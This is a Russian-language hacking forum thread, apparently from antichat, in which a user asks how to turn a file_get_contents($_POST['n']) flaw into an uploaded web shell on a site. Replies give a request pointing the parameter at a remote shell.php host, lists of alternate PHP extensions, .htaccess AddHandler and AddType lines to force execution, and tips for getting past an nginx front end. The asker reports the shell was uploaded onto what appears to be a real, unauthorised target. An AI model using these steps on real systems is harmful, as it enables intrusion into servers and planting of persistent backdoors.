Просмотр полной версии : Помогите залить шел
На изучаемом сайте найдена уязвимость:
file_get_contents($_POST['n'])
можно ли как-то залить шел или выполнить sql запрос?
Спасибо.
Например вот так:
site/?n=http://exec.site/shell.php
в shell.php
eastpearldxb
24.11.2017, 21:43
Задил шелл, но тут проблемка. В папке где залит шелл, нельзя выполнять команды php, то есть файлы с расширением php нельзя запустить
php2,php3,php5,phtml,shtml
eastpearldxb
24.11.2017, 23:32
↑ (https://antichat.live/posts/4153127/)
php2,php3,php5,phtml,shtml
Не работает, может туда как нибудь .htaccess залить?
ну если там есть .htaccess, то не зальешь, а в другую папку?
eastpearldxb
25.11.2017, 11:44
↑ (https://antichat.live/posts/4153146/)
ну если там есть .htaccess, то не зальешь, а в другую папку?
Шел то залился, только он не запускуется,ьак как нельзя php файлы запускать. php2, php3 и тог далее тоже не помогает. Как еще можно запустить шелл?
в другую папку пробуй залить шелл
eastpearldxb
25.11.2017, 11:56
↑ (https://antichat.live/posts/4153272/)
в другую папку пробуй залить шелл
Да в другие папкм также получается. На гугле прочитал, что можно как то через .htaccess дать доступ к php файлам
gena ryzhov
25.11.2017, 14:01
↑ (https://antichat.live/posts/4153277/)
Да в другие папкм также получается. На гугле прочитал, что можно как то через .htaccess дать доступ к php файлам
В Гугле: addhandler htaccess
AddHandler application/x-httpd-php .расширение
AddType application/x-httpd-php .php . расширение
gena ryzhov said:
↑ (https://antichat.live/posts/4153334/)
В Гугле: addhandler htaccess
AddHandler application/x-httpd-php .расширение
AddType application/x-httpd-php .php . расширение
RemoveHandler желательно сначала делать, чтоб поменьше коллизий было
gena ryzhov
25.11.2017, 14:33
↑ (https://antichat.live/posts/4153277/)
Да в другие папкм также получается. На гугле прочитал, что можно как то через .htaccess дать доступ к php файлам
Но если перед апачем стоит nginx то нужно расширение файла которое nginx пропустит к апачу)
gena ryzhov said:
↑ (https://antichat.live/posts/4153357/)
Но если перед апачем стоит nginx то нужно расширение файла которое nginx пропустит к апачу)
можно воспользоваться методом [тут цензура] , для обхода кеширования сеошники добавляют такие веши app.css?v=12345 , такой запрос долетит до апача
хотя в целом ситуация очень редкая, расширение файла которое подхватывается nginx'ом и выполняется на бекенде..
vBulletin® v3.8.14, Copyright ©2000-2026, vBulletin Solutions, Inc. Перевод: zCarot